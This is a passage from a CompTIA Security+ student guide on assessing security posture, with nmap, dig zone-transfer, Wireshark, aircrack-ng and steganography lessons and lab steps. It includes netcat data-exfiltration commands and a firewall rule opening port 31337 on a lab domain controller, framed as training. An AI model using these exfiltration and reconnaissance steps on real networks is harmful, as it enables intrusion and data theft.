use it as a Remote Access Tool (RAT) or backdoor. To do this, the tester must establish
a Command and Control (C2 or C&C) network to use to control the compromised
host (upload tools and download data). The connection to the compromised host will
typically require a malware executable to run and a connection to a network port and
the attacker's IP address (or range of IP addresses) to be available.
Persistence will be followed by further reconnaissance, where the pen tester attempts
to map out the internal network and discover the services running on it and accounts
configured to access it.
Activity 3-1
Discussing Penetration Testing
Concepts
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
The tester will attempt to penetrate the security system without having any
privileged knowledge about its configuration.
ISPs monitor their networks for suspicious traffic and may block the test
attempts. The pen test may also involve equipment owned and operated by the
ISP.
Access to a host system and/or privileges that allow the attacker to gain control
or visibility over a wider range of hosts on the target network.
Topic B
Assess Security Posture with Topology
Discovery Software Tools
EXAM OBJECTIVES COVERED
2.2 Given a scenario, use appropriate software tools to assess the security posture of an
organization.
You will often need to run scans using both command-line and GUI tools to complete
security posture assessments. This topic identifies tools that you can use to perform
network mapping or topology discovery assessments.
NETWORK SCANNERS
Topology discovery (or "footprinting") is the part of the discovery phase where the
attacker or pen tester starts to identify the structure of the target network.
Organizations will also use topology discovery as an auditing technique to build an
asset database and identify non-authorized hosts (rogue system detection) or
network configuration errors. An attacker attempting to work out the network topology
stealthily faces several problems:
• Gaining access to the network—both the challenge of connecting to the physical
wired or wireless network and of circumventing any access control or
authentication mechanisms that could block his or her equipment from receiving
network traffic.
• Scanning stealthily—to prevent the network owner detecting and blocking the scans
and being alerted to an intrusion event.
• Gaining access to the wider network from the local segment—this may involve
defeating access control lists on routers and firewalls.
A network mapping tool performs host discovery and identifies how the hosts are
connected together on the network. For auditing, there are enterprise suites, such as
Microsoft's System Center products or HP's OpenView/Business Technology
Optimization (BTO). Such suites can be provided with credentials to perform
authorized scans and obtain detailed host information via management protocols,
such as the Simple Network Management Protocol (SNMP). A couple of basic Windows®
and Linux® commands can be used to facilitate host discovery.
Identifying the current IP configuration with ipconfig. (Screenshot used with permission from
Microsoft.)
In Linux, the ifconfig command can be used to report the adapter configuration and
enable or disable it or apply a different static IP configuration. Going forward, the ip
command is intended to replace ifconfig. ip is a more powerful tool, with
options for managing routes as well as the local interface configuration. The basic
functionality of ifconfig (show the current address configuration) is performed by
running ip a
Performing a ping sweep in Windows with a For loop—Searching multiple octets requires nested loops.
(Screenshot used with permission from Microsoft.)
A machine's Address Resolution Protocol (ARP) cache can also be examined for host
entries (using the arp -a command). The ARP cache shows the hardware (MAC)
address of the interface associated with each IP address the local host has
communicated with recently.
internetwork topology, you need a more advanced tool. You can use Nmap with the
‑‑traceroute option to record the path to an IP target address. The Zenmap tool
can use this information to display a graphic of the detected network topology.
Using the --traceroute option and topology view in Zenmap. (Screenshot used with permission from
nmap.org.)
whois output for comptia.org. (Screenshot used with permission from Microsoft.)
An attacker may also test a network to find out if the DNS service is misconfigured. A
misconfigured DNS may allow a zone transfer, which will give the attacker the
complete records of every host in the domain, revealing a huge amount about the way
the network is configured. You can use the nslookup command in interactive mode to
attempt a zone transfer:
set type=any
ls -d comptia.org
Testing whether the name server for comptia.org will allow a zone transfer. (Screenshot used with
permission from Microsoft.)
You can also use the dig command from any Linux or UNIX machine with the dnsutils
package installed.
dig axfr @NameServer Target
The command is an acronym for domain internet groper (dig). A zone transfer is
often called an "axfr" after this switch sequence. For example, the following command
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 3: Assessing Security Posture with Software Tools | Topic B
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 79
queries the name server ns1.isp.com for the zone records for the widget.com
domain:
dig axfr @ns1.isp.com widget.com
If DNS harvesting is successful, you will obtain IP addresses for servers in the target
domain. You can use an IP geolocation tool to identify the approximate geographic
location of the servers.
Note: You can install dig on Windows by downloading the BIND DNS server package
(https://www.isc.org/downloads/) and installing it using the tools-only option.
Note: To learn more, watch the related Video on the course website.
Activity 3-2
Discussing Topology Discovery Software
Tools
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What are the two principal uses of network scanning tools in the context of
auditing?
Rogue system detection to locate hosts that are not authorized to communicate
on the network and network mapping to validate the topology of the network
and presence of authorized hosts.
2. What command line tool would you use to identify the current network
addressing configuration of a wired adapter on a Linux host?
ip or ifconfig or ip a
3. What is the purpose of using the ping and arp tools together?
To obtain both the IP and MAC addresses of local hosts. Ping performs a
connectivity test with a host via its IP address. If the host is contacted, the
Address Resolution Protocol (ARP) cache is updated with its IP:MAC address
mapping. The arp tool queries the cache to obtain the host's MAC address.
4. Which command is used to query a DNS server for records from a Linux
host?
dig
Activity 3-3
Performing Network Scanning with
Software Tools
SCENARIO
In this activity, you will use a variety of tools to probe the hosts running on the local
network. This activity is designed to test your understanding of and ability to apply
content examples in the following CompTIA Security+ objective:
• 2.2 Given a scenario, use appropriate software tools to assess the security posture
of an organization.
1. Determine the configuration of the local host and its subnet, using tools such as
ifconfig and arp. You will be running the scanning from the KALI VM, which
will need to be attached to the LAN switch with the Windows VMs.
a) Open the connection window for the KALI VM. From the menu bar on the connection
window, select File→Settings.
b) Select the eth0 node. In the right-hand pane, under Virtual switch, select vLOCAL.
Select OK.
Connect the KALI VM (https://www.kali.org) to the LAN virtual switch so that it is on the
same network segment as the Windows VMs. (Screenshot used with permission from
Microsoft.)
c) Log on with the credentials root and Pa$$w0rd.
Note: If the privacy shade has activated, click-and-drag up with the mouse to
show the sign in box.
The output of the ifconfig command. (Screenshot used with permission from Offensive
Security.)
f) Run ip a to show the same information using the newer "ip" tool.
The output of the ip a command. (Screenshot used with permission from Offensive
Security.)
g) Run arp -a to check the ARP cache—are there any other hosts local to this
subnet? If so, make a note of the IP addresses.
h) Run ip neighbor to show similar information using the newer "ip" tool.
The ARP cache shows only machines that have communicated with the local host. To
verify whether any other hosts are present, you can perform a "sweep" of the local
network. One means of doing this is to use ping in a for/next loop. You can also use
the netdiscover tool bundled with Kali.
i) Run netdiscover -h to view the help page. The tool can operate in a passive
mode, but you do not need to be stealthy, so you will run an active scan.
j) Run netdiscover -i eth0 -r 10.1.0.0/24
The scan results should discover several other hosts connected to the vLOCAL switch.
2. Find out more about the other hosts on the subnet. Network reconnaissance will
typically aim to discover the following:
• Default gateway (the router connecting the subnet to other networks).
• DNS server (used to resolve host names on the network).
• Whether any network directory/authentication and application servers are present.
• Whether any host/client access devices are present.
• Whether any other types of devices (embedded systems or appliances) are present.
You can obtain this information using a variety of different tools.
a) Run the following command to identify the default gateway: ip route show
Because the network uses DHCP to provide client addresses, the local machine has
been configured with a default gateway address automatically.
b) Type nmap -sS 10.1.0.254—before pressing Enter, write what the output
of this scan is going to be:
c) Run the command and check the output. What services are running and what do they
tell you about the host?
This syntax will scan the default port range (1000 ports) on the target.
Nmap service discovery scan output. (Screenshot used with permission from nmap.org.)
d) Run nmap -A 10.1.0.254 to try to identify more about the host.
Nmap OS fingerprinting scan output. (Screenshot used with permission from nmap.org.)
e) Look at the information obtained from analyzing the open ports.
• 22—this is an SSH (Secure Shell) port, which would be used to configure the router
remotely. The hostkey is the public key used to identify the host and initialize the
encryption of communications over the secure channel. Note that Nmap has
identified the version of OpenSSH running the service.
• 53—the router is running a Domain Name Service (DNS), either because it hosts
one or more domains or provides forwarding for clients. The software behind this
port is not identified ("tcpwrapped" usually indicates that the service is protected
by an ACL).
• MAC Address—Nmap correctly identifies the OUI portion as belonging to
Microsoft (the MAC address is assigned by Hyper-V).
• CPE (Common Platform Enumeration)—Nmap approximates the kernel version
and does not identify a specific Linux distribution (VyOS is derived from Debian).
The router is not running any sort of dynamic routing protocol on this local interface.
3. An organization needs to make some information about its network public, such
as the identity of web and email servers. Misconfigured DNS services can allow an
adversary to discover a huge amount of information about a private network.
a) Optionally run dig
-h to familiarize yourself with the options for the command.
b) Run dig -x 10.1.0.254
This performs a reverse lookup on the default gateway. No record is found (there is
no reverse lookup zone configured) but note that the server answering your queries
is 10.1.0.1.
dig reverse lookup query. (Screenshot used with permission from Offensive Security.)
c) Run dig soa corp.515support.com
dig query for Start of Authority DNS server record. (Screenshot used with permission from
Offensive Security.)
The query returns the FQDN of the DNS server responsible for the domain (DC1.corp.
515support.com) and its host record (10.1.0.1).
d) Note some of the flags shown:
Performing a zone transfer. (Screenshot used with permission from Offensive Security.)
g) Close the terminal window.
d) When the scan completes, observe the log messages recorded in the Nmap Output
box:
• After loading scripts, Nmap performs an ARP Ping scan to discover hosts in the
specified IP range (10.1.0.0—10.1.0.255). Hosts that do not respond are recorded
as "down" and no further scans are attempted (using this profile).
• In the next phase, a SYN Stealth scan is performed against the live hosts. Any TCP
ports in the default range found open are listed.
• In the final phase, Nmap runs OS detection scripts to probe each port and analyze
the information returned to identify services and the OS type and version of each
host.
e) After the Nmap done message is displayed and the left column is populated, select
the Topology tab.
The Topology tab shows each host on a certain ring, representing the number of
hops distance from localhost (the scanning host). For this scan, all the hosts are local
to one another so there is only one ring.
f) Select the Legend button to check what the icons and colors mean.
This tab shows the summary of "interesting" ports for each host (select from the list
on the left).
h) Take a few moments to browse the results for each host (select from the list on the
left). You may reach some of the following conclusions:
• DC1 (10.1.0.1) is a domain controller! As well as HTTP and DNS, the TCP ports are
for directory queries (LDAP), authentication (Kerberos), and file/printer sharing
plus remote monitoring and administration.
• MS1 (10.1.0.2) was identified as a mail server in the zone records and Nmap has
identified the hMailServer application listening on SMTP (25/587) and IMAP (143)
ports. It is running Microsoft's IIS web server though and Nmap has correctly
identified it as version 10.
HTTP and email service ports. (Screenshot used with permission from nmap.org.)
Zenmap Host Details tab. (Screenshot used with permission from nmap.org.)
This tab shows the summary of OS detection results for each host (select from the list
on the left).
j) Take a few moments to browse the results for each host. Note some of the features
of the reports:
• The icons represent the number of open ports.
• Both Windows Servers are more-or-less correctly identified; expand Ports used to
show which was used for fingerprinting. The version is actually Server 2016.
• The Windows Client versions may show some variation in terms of correct
identification.
• The sequence fields show how vulnerable the host may be to blind spoofing
attacks. These types of attacks are generally impractical against modern operating
systems.
k) Close all windows open on the KALI desktop.
Topic C
Assess Security Posture with
Fingerprinting and Sniffing Software
Tools
EXAM OBJECTIVES COVERED
2.2 Given a scenario, use appropriate software tools to assess the security posture of an
organization.
Several tools can be used to probe hosts and networks more deeply. As a security
professional, you will often need to report host configuration using fingerprinting tools
and capture and analyze network traffic. You should also understand how tools can be
used to operate backdoor connections to a host and to covertly exfiltrate data.
SERVICE DISCOVERY
Having identified active IP hosts on the network and gained an idea of the network
topology, the next step for an attacker is to identify "hosts of interest." The attacker will
want to work out which operating systems are in use (for both PC hosts and network
appliances, such as switches, routers, and firewalls) and which network services each
host is running (and if possible, which application software is underpinning those
services). This process is described as service discovery. The detailed analysis of
services on a particular host is often called fingerprinting. This is because each OS or
application software that underpins a network service responds to probes in a unique
way. This allows the scanning software to guess at the software name and version,
without having any sort of privileged access to the host. Service discovery can also be
used defensively, to probe potential rogue systems and identify the presence of
unauthorized network service ports or traffic.
netstat
The netstat command allows you to check the state of ports on the local machine
(Windows or Linux). You can use netstat to check for service misconfigurations
(perhaps a host is running a web or FTP server that a user installed without
authorization). You may also be able to identify suspect remote connections to services
on the local host or from the host to remote IP addresses. If you are attempting to
identify malware, the most useful netstat output is to show which process is
listening on which ports. Note that an Advanced Persistent Threat (APT) might have
been able to compromise the netstat command to conceal the ports it is using, so
a local scan may not be completely reliable.
On Windows, used without switches, the command outputs active TCP connections,
showing the local and foreign addresses and ports. The following additional switches
can be used:
• -a displays all connections (active TCP and UDP connections plus ports in the
listening state).
• -b shows the process name that has opened the port.
• -o shows the Process ID (PID) number that has opened the port.
netstat command running on Windows showing activity during an nmap scan. The findstr function is
being used to filter the output (to show only connections from IPv4 hosts on the same subnet).
(Screenshot used with permission from Microsoft.)
Linux supports a similar utility with some different switches. Used without switches, it
shows active connections of any type. If you want to show different connection types,
you can use the switches for Internet connections for TCP (‑t) and UDP (‑u), raw
connections (‑w), and UNIX sockets/local server ports (‑x). For example, the following
command shows Internet connections (TCP and UDP) only: netstat ‑tu
Linux netstat output showing active and listening TCP and UDP connections.
Linux netstat interface statistics showing receive and transmit packets numbers plus errors and
dropped packets.
The following represent some of the main types of scanning that Nmap can perform:
• TCP SYN (-sS)—this is a fast technique also referred to as half-open scanning, as
the scanning host requests a connection without acknowledging it. The target's
response to the scan's SYN packet identifies the port state.
• TCP connect (-sT)—a half-open scan requires Nmap to have privileged access to
the network driver so that it can craft packets. If privileged access is not available,
Nmap has to use the OS to attempt a full TCP connection. This type of scan is less
stealthy.
• TCP flags—you can scan by setting TCP headers in unusual ways. A Null (-sN) scan
sets the header bit to zero, a FIN (-sF) scan sends an unexpected FIN packet, and
an Xmas scan (-sX) sets the FIN, PSH, and URG flags. This was a means of
defeating early types of firewalls and IDS.
• UDP scans (-sU)—scan UDP ports. As these do not use ACKs, Nmap needs to wait
for a response or timeout to determine the port state, so UDP scanning can take a
long time. A UDP scan can be combined with a TCP scan.
• Port range (-p)—by default, Nmap scans 1000 commonly used ports. Use the -p
argument to specify a port range.
Half-open scanning with nmap. (Screenshot used with permission from nmap.org.)
OS FINGERPRINTING
When services are discovered, you can use Nmap with the -sV or -A switch to probe
a host more intensively to discover the following information:
• Protocol—do not assume that a port is being used for its "well known" application
protocol. Nmap can scan traffic to verify whether it matches the expected signature
(HTTP, DNS, SMTP, and so on).
• Application name and version—the software operating the port, such as Apache®
web server or Internet Information Services (IIS) web server.
• OS type and version—use the -o switch to enable OS fingerprinting (or -A to use
both OS fingerprinting and version discovery).
• Host name.
• Device type—not all network devices are PCs. Nmap can identify switches and
routers or other types of networked devices, such as NAS boxes, printers, and
webcams.
Nmap comes with a database of application and version fingerprint signatures,
classified using a standard syntax called Common Platform Enumeration (CPE).
Unmatched responses can be submitted to a web URL for analysis by the community.
OS/service discovery scan performed against a Linux web server. (Screenshot used with permission
from nmap.org.)
BANNER/OUI GRABBING
When a host running a particular operating system responds to a port scan, the syntax
of the response might identify the specific operating system. This fact is also true of
application servers, such as web servers, FTP servers, and mail servers. The responses
these servers make often include several headers or banners that can reveal a great
deal of information about the server. Banner grabbing refers to probing a server to
try to elicit any sort of response that will identify the server application and version
number or any other interesting detail about the way the server is configured. This
information allows an attacker to identify whether the server is fully patched and to
look up any known software vulnerabilities that might be exposed.
Note: Client applications broadcast information in the same way. For example, a web
browser will reveal its type and version number when connecting to a server.
The responses to network probes can be used to identify the type and version of the host operating
system. (Screenshot used with permission from nmap.org.)
SNIFFER
A sniffer is a tool that captures frames moving over the network medium. This might
be a cabled or wireless network.
Note: Often the terms sniffer and protocol analyzer are used interchangeably.
A simple software-based sniffer will simply interrogate the frames received by the
network adapter by installing a special driver. Examples include libpcap (for UNIX and
Linux) and its Windows version winpcap. These software libraries allow the frames to
be read from the network stack and saved to a file on disk. Most also support filters to
reduce the amount of data captured. A hardware sniffer might be capable of tapping
the actual network media in some way or be connected to a switch port. Also, a
hardware sniffer might be required to capture at wirespeed on 1+ Gbps links (or
faster). A workstation with basic sniffer software may drop large numbers of frames
under heavy loads.
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 3: Assessing Security Posture with Software Tools | Topic C
98 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
PROTOCOL ANALYZER
A protocol analyzer (or packet analyzer) works in conjunction with a sniffer to
perform traffic analysis. You can either analyze a live capture or open a saved capture
(.pcap) file. Protocol analyzers can decode a captured frame to reveal its contents in a
readable format. You can choose to view a summary of the frame or choose a more
detailed view that provides information on the OSI layer, protocol, function, and data.
PREVENTING EAVESDROPPING
Eavesdropping requires physical access to the network and the ability to run the
protocol analyzer software. This means that in order to prevent eavesdropping you
need to control the use of this kind of software by making sure that it is only installed
and used by authorized users. You also need to prevent the unauthorized attachment
of devices. This is typically achieved by configuring some sort of switch port security.
You can also mitigate eavesdropping by ensuring that the network traffic (or at least
confidential information passing over the network) is encrypted.
TCPDUMP
tcpdump is a command-line packet capture utility for Linux, though a version of the
program is available for Windows (windump found at https://www.winpcap.org/
windump). The basic syntax of the command is tcpdump -i eth0, where
eth0 is the interface to listen on (you can substitute with the keyword any to listen
on all interfaces of a multi-homed host). The utility will then display captured packets
until halted manually (Ctrl+C). The operation of the basic command can be modified by
switches.
Note: Refer to http://www.tcpdump.org for the full help and usage examples.
WIRESHARK
Wireshark (http://wireshark.org) is an open source graphical packet capture and
analysis utility, with installer packages for most operating systems. Having chosen the
interfaces to listen on, the output is displayed in a three-pane view, with the top pane
showing each frame, the middle pane showing the fields from the currently selected
frame, and the bottom pane showing the raw data from the frame in hex and ASCII.
Wireshark is capable of parsing (interpreting) the headers of hundreds of network
protocols. You can apply a capture filter using the same expression syntax as
tcpdump. You can also apply display filters using a different and more powerful set
of expressions (a query can be built via the GUI tools, too). Another useful option is to
use the Follow TCP Stream context command to reconstruct the packet contents for a
TCP session.
PACKET INJECTION
Some attacks depend on sending forged or spoofed network traffic. Often network
sniffing software libraries allow frames to be inserted (or injected) into the network
stream. There are also tools that allow for different kinds of packets to be crafted and
manipulated. Well-known tools used for packet injection include Dsniff (https://
monkey.org/~dugsong/dsniff/), Ettercap (http://www.ettercap-project.org/
ettercap), hping (http://hping.org), Nemesis (http://nemesis.sourceforge.net), and
Scapy (http://scapy.net/).
WIRELESS SCANNERS/CRACKERS
Several tools are available to probe and audit wireless networks. A wireless scanner
can be used to detect the presence of such networks and report the network name
(SSID), the MAC address of the access point (BSSID), the frequency band (2.4 or 5 GHZ)
and radio channel used by the network, and the security mode.
Surveying Wi-Fi networks using inSSIDer. (Screenshot used with permission from MetaGeek, LLC.)
Tools are also available to sniff packets as they are transmitted wirelessly. As with p-
mode on Ethernet, sniffing non-unicast wireless traffic requires a wireless adapter
driver that supports monitor mode. While this is often possible in Linux, under
Windows, it is usually necessary to obtain a wireless adapter designed specifically for
packet capture. You can read more about sniffing wireless traffic from Wireshark's
documentation (https://wiki.wireshark.org/CaptureSetup/WLAN).
To decode wireless packets, an attacker most overcome (or "crack") the encryption
system. There is an Aircrack-ng suite of utilities (https://www.aircrack-ng.org)
designed for wireless network security testing. Installers are available for both Linux
and Windows. The principal tools in the suite are as follows:
• airmon-ng—enable and disable monitor mode.
• airodump-ng—capture 802.11 frames.
• aireplay-ng—inject frames to perform an attack to obtain the authentication
credentials for an access point.
• aircrack-ng—decode the authentication key.
Aireplay sniffs ARP packets to harvest IVs while Airodump saves them to a capture, which Aircrack can
analyze to identify the correct encryption key. (Screenshot used with permission from aircrack-ng.org.)
On the handler (IP 10.1.0.192), the attacker receives the file using the following
command:
nc -l -p 6666 > accounts.sql
Note: cryptcat performs a similar function but with the ability to encrypt the
channel.
STEGANOGRAPHY
Steganography (literally meaning "hidden writing") is a technique for obscuring the
presence of a message. Typically, information is embedded where you would not
expect to find it (a message hidden in a picture, for instance). The container document
or file is called the covertext. A steganography tool is software that facilitates this (or
conversely can be used to detect the presence of a hidden message within a covertext).
When used to conceal information, steganography amounts to "security by obscurity,"
which is usually deprecated. However, a message can be encrypted by some
mechanism before embedding it, providing confidentiality. The technology can also
provide integrity or non-repudiation; for example, it could show that something was
printed on a particular device at a particular time, which could demonstrate that it was
genuine or a fake, depending on context.
One example of steganography is to encode messages within TCP packet data fields to
create a covert message channel. Another approach is to change the least significant
bit of pixels in an image file (the cover file); this can code a useful amount of
information without distorting the original image noticeably. These methods might be
used to exfiltrate data covertly, bypassing protection mechanisms such as Data Loss
Prevention (DLP).
Another example of steganography is to use the design and color of bank notes to
embed a watermark. This method is employed by the Counterfeit Deterrence
System (CDS). CDS is now incorporated on banknotes for many currencies. When a
copy device or image editing software compatible with CDS detects the watermark
embedded in the currency design, it prevents reproduction of the image, displaying an
error message to the user. Anti-counterfeiting measures for currency are overseen by
Central Bank Counterfeit Deterrence Group (CBCDG found at http://
www.rulesforuse.org).
The use of steganography to identify the source of output is also illustrated by the
automatic incorporation of watermarks on all printed output by some models of
printers. These watermarks are printed as tiny yellow dots, invisible to the naked eye.
The pattern identifies the printer model, serial number, and date and time of printing.
This prevents output from commercial printers being used for forging secure
documents, such as banknotes or passports.
Note: To learn more, watch the related Video on the course website.
Activity 3-4
Discussing Fingerprinting and Sniffing
Software Tools
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
The local and foreign addresses and TCP ports where the server port is in the
"Established" or "Wait" state, but not "Listening" ports.
Identifying the type of device/appliance, the OS/OS version, or the type and
version of applications software. Fingerprinting works by analyzing the specific
responses to probes and through techniques such as banner grabbing.
No—to eavesdrop the sniffer has to be attached to the same local network
segment.
4. True or false? A packet sniffer attached to a spanning port would reveal the
presence of a rogue device if that device attempted to communicate on the
network.
True, though you would need to know what constituted "rogue" traffic (some
combination of IP source and destination addresses and port) and the device
may be able to evade detection by spoofing a valid address.
5. Is it possible to discover what ports are open on a web server from another
computer on the Internet?
Yes (providing the web server is not protected against port scanning).
6. What security posture assessment could a pen tester make using Netcat?
Whether it is possible to exfiltrate data from a host without alerting the data
owner, bypassing any Data Loss Prevention (DLP) mechanisms, for example.
Activity 3-5
Analyzing Network Traffic with Packet
Sniffing Software Tools
SCENARIO
In this activity, you will use a variety of tools to examine communications between
hosts running on the local network. This activity is designed to test your understanding
of and ability to apply content examples in the following CompTIA Security+ objective:
• 2.2 Given a scenario, use appropriate software tools to assess the security posture
of an organization.
Configuring a VM's switch port as a source for port mirroring. (Screenshot used with
permission from Microsoft.)
d) In Hyper-V Manager, right-click the PC1 VM and select Settings.
e) Expand the Network Adapter node to select its Advanced Features node.
f) From the Mirroring mode list, select Source. Select OK.
g) In Hyper-V Manager, right-click the KALI VM and select Settings.
h) Select the eth0 node, then from the Virtual switch list box, select vLOCAL.
i) Expand the eth0 node to select its Advanced Features node.
j) From the Mirroring mode list, select Destination. Select OK.
2. Use the KALI VM to capture some network traffic and identify the main features of
the Wireshark network analyzer.
a) Open a connection window for the KALI VM and log on with the credentials root and
Pa$$w0rd
• 10.1.0.10x—the client (PC1) (the last octet of the address will vary as it is allocated
by DHCP).
• 10.1.0.254—the router (RT1-LOCAL).
Note that the KALI VM (10.1.0.192) does not generate any traffic.
f) Select any DNS frame from the top panel, then observe the frame contents displayed
in the middle panel.
Wireshark splits out the successive headers and payloads to decode each protocol:
Frame capture and analysis using Wireshark. (Screenshot used with permission from
wireshark.org.)
h) In the top pane, right-click the frame and select Follow→TCP Stream.
The contents will not be entirely comprehensible (probably advertising an IPC$ share),
but you can use this feature to view the payload in any sort of exchange of TCP or
UDP packets.
Using the Follow TCP Stream feature in Wireshark. (Screenshot used with permission from
wireshark.org.)
i) Select the list box that currently displays Entire conversation at the bottom-left to
control the filter to show just the client (red) or server (blue) packets.
j) Select the scroll arrows on the Stream box to view other streams in the capture.
k) Select the Close button.
l) Note that this has left a display filter activated. Select the X button to delete it.
m) Select the Stop button on the toolbar to end the live capture.
e) Switch back to the KALI VM. In Wireshark, select the Stop Capture button.
f) Look at the set of purple frames in the first part of the capture, consisting mostly of
Kerberos traffic.
This is the authentication process for the Windows domain. You will not find any
cleartext passwords here though!
g) Sort the capture by the Info field. Look through the captured packets until you find
one with a description (info field) starting with NetShareEnumAll Response or Ioctl
Response.
This is the packet that the server uses to send its share list to the client.
Note: Sorting the capture by the Info field makes viewing the packets easier.
Also, you can right-click in the packet data frame and select Expand All to
view all fields.
Enumerating shares in the SMB protocol. (Screenshot used with permission from
wireshark.org.)
h) Select this packet, and read its contents in the Packet Data frame (or follow the TCP
stream).
You may have to scroll down to view all the data. What information is readable?
The server transfers its entire share list, including the LABFILES folder requested, but
also hidden administrative shares. It is the client that chooses not to display the
hidden shares.
i) Search further through the packets until you find a packet with an info field beginning
with Create Response File.
These packets are used by the server to transfer a list of the files contained in the
folder to the client.
j) Search further through the packets until you find a packet with the info field Read
Response, following a sequence of Create Request File and Create Response File
frames for CONFIDENTIAL.txt.
This packet is used by the server to transfer the file’s contents to the client.
k) Select this packet and read its contents in the Packet Data frame.
You should be able to read the secret message in the data.
Viewing the contents of a file in a packet capture. (Screenshot used with permission from
wireshark.org.)
Note: This frame should be near the end of the capture file. You can also sort
by the Info field to identify all the Read Response frames and locate the
correct one.
4. Imagine that a rogue administrator wants to exfiltrate this confidential data file
and has installed a backdoor to facilitate this. You will use Nmap's version of
Netcat (ncat.exe).
You'll leave aside the question of why this file might be important when he or she has a
whole domain controller to exploit.
a) On the KALI VM, select the toolbar button to start a new capture with the same
options. Select Continue without Saving when prompted.
b) Open a connection window for the DC1 VM and sign in as 515support\Administrator
with the password Pa$$w0rd
c) On the VM connection window, select Media→DVD Drive→Insert Disk.
d) Browse to select C:\COMPTIA-LABS\odysseus.iso and then select Open.
e) Open a command prompt. Run the following command to start a Netcat listener:
d:\ncat -l --send-only < c:\labfiles\confidential.txt
f) Switch to the PC1 VM. On the VM connection window, select Media →DVD
Drive→Insert Disk.
g) Browse to select C:\COMPTIA-LABS\odysseus.iso and then select Open.
h) Open a command prompt. Run the following command to try to connect to the
listener and download the file:
d:\ncat 10.1.0.1 > confidential.txt
i) Can you think why this doesn't work? Try to find the connection attempt in Wireshark
for a clue.
The connection is blocked by Windows Firewall.
j) Switch to the DC1 VM.
k) Open a second command prompt as administrator and use it to run the following
command to identify TCP service ports on the local machine and the processes that
opened them:
netstat -abp TCP
l) Which port is Ncat listening on?
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 3: Assessing Security Posture with Software Tools | Topic C
110 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
m) Run the following command to open that port on Windows Firewall (ignore the line
breaks and type it all as a single command):
netsh advfirewall firewall add rule name="Network Service
Port" dir=in action=allow protocol=TCP localport=31337
n) Run the following command to monitor established TCP connections:
netstat -pt TCP 10
o) Switch to the PC1 VM and log in as 515support\Administrator with the password Pa
$$w0rd. Run this command to try to connect to the listener and download the file:
ncat 10.1.0.1 > confidential2.txt
If the file transfers successfully, the remote listener will close the connection forcibly
(because of the --send-only parameter).
p) On the DC1 VM, observe the netstat output for the connection established on port
31337.
If you do not see one, try exchanging a larger file. Press Ctrl+C to halt netstat.
q) On the KALI VM, stop the Wireshark capture and observe the file transfer.
Note that you can read the text in the document.
Note: Note that binary files can be intercepted in the same way. There are
utilities to extract binary files from network packets and reconstruct them for
opening in the original application.
You can see that these simple tools are easy to detect. Cyber adversaries require a
much more sophisticated toolkit to bypass firewalls and perform data exfiltration
covertly (or target a company with no monitoring controls).
Activity 3-6
Concealing Data with Steganography
Tools
SCENARIO
In this activity, you will investigate techniques for concealing information within the
Windows file system. This activity is designed to test your understanding of and ability
to apply content examples in the following CompTIA Security+ objective:
• 2.2 Given a scenario, use appropriate software tools to assess the security posture
of an organization.
1. Check the file properties of the comptia-logo.jpg file and verify the file using the
WinMD5 hash utility.
A basic steganography tool encodes information within another file, typically a media file
such as a picture or audio/video file. A typical technique is to encode information in the
least significant bit of the image or audio data. This does not materially affect the picture or
sound and does not alter the file header (though it can change the file size).
a) Start the PC1 VM and sign in as .\Admin using the password Pa$$w0rd
b) Open a File Explorer window and browse to the C:\LABFILES folder. Right-click the
comptia-logo.jpg image file and select Properties.
Note the size and created/modified/accessed dates and times: ___________
c) Close the Properties dialog box.
d) In the C:\LABFILES folder, double-click WinMD5. Drag the comptia-logo.jpg file into
the Select a file dialog box in the WinMD5 window.
This causes the program to generate a file checksum. A file checksum uses a
cryptographic algorithm to generate a unique value based on the file contents. If the
file is changed, the checksum of the modified file will not match the original.
e) Copy the value from the Current file MD5 checksum value box to the Original file
MD5 checksum value box. Leave the WinMD5 window open.
Topic D
Assess Security Posture with
Vulnerability Scanning Software Tools
EXAM OBJECTIVES COVERED
1.5 Explain vulnerability scanning concepts.
2.2 Given a scenario, use appropriate software tools to assess the security posture of an
organization.
Performing vulnerability scans will be one of the common tasks you perform as an
information security professional, so you must know the configuration options
available for different scan types. As part of security posture assessment audits, you
may also need to use exploitation frameworks and honeypots to actively probe
security controls.
Greenbone OpenVAS vulnerability scanner with Security Assistant web application interface as
installed on Kali Linux. (Screenshot used with permission from Greenbone Networks, http://
www.openvas.org.)
Nessus Manager web management interface. (Screenshot used with permission from Tenable Network
Security.)
Active scanning techniques involve making a connection to the target host. This might
mean authenticating and establishing a session with the host or running an agent on a
host. This is more likely to cause performance problems with the host, so active scans
are very often scheduled during periods of network downtime. Active techniques are
more likely to detect a wider range of vulnerabilities in host systems and can reduce
false positives. A false positive is something that is identified by a scanner or other
assessment tool as being a vulnerability, when in fact it is not. It is important for you to
understand the risks of acting on a false positive, as attempting to resolve a non-
existent or misattributed issue by making certain configuration changes could have a
significant negative impact on the security of your systems. For example, assume that
a vulnerability scan identifies an open port on the firewall. Because a certain brand of
malware has been known to use this port, the tool labels this as a security risk, and
recommends that you close the port. However, the port is not open on your system.
Researching the issue costs time and effort, and if excessive false positives are thrown
by a vulnerability scan, it is easy to disregard the scans entirely, which could lead to
larger problems.
You should also be alert to the possibility of false negatives; that is, potential
vulnerabilities that are not identified in a scan. This risk can be mitigated somewhat by
running repeat scans periodically and by using scanners from more than one vendor.
Also, because intrusive techniques depend on pre-compiled scripts, they do not
reproduce the success that a skilled and determined hacker might be capable of and
can therefore create a false sense of security. Using disruptive tests is also hugely
problematic on a production network.
Configuring credentials for use in target (scope) definitions in Greenbone OpenVAS as installed on Kali
Linux. (Screenshot used with permission from Greenbone Networks, http://www.openvas.org.)
Note: Bear in mind that the ability to run a vulnerability test with administrative
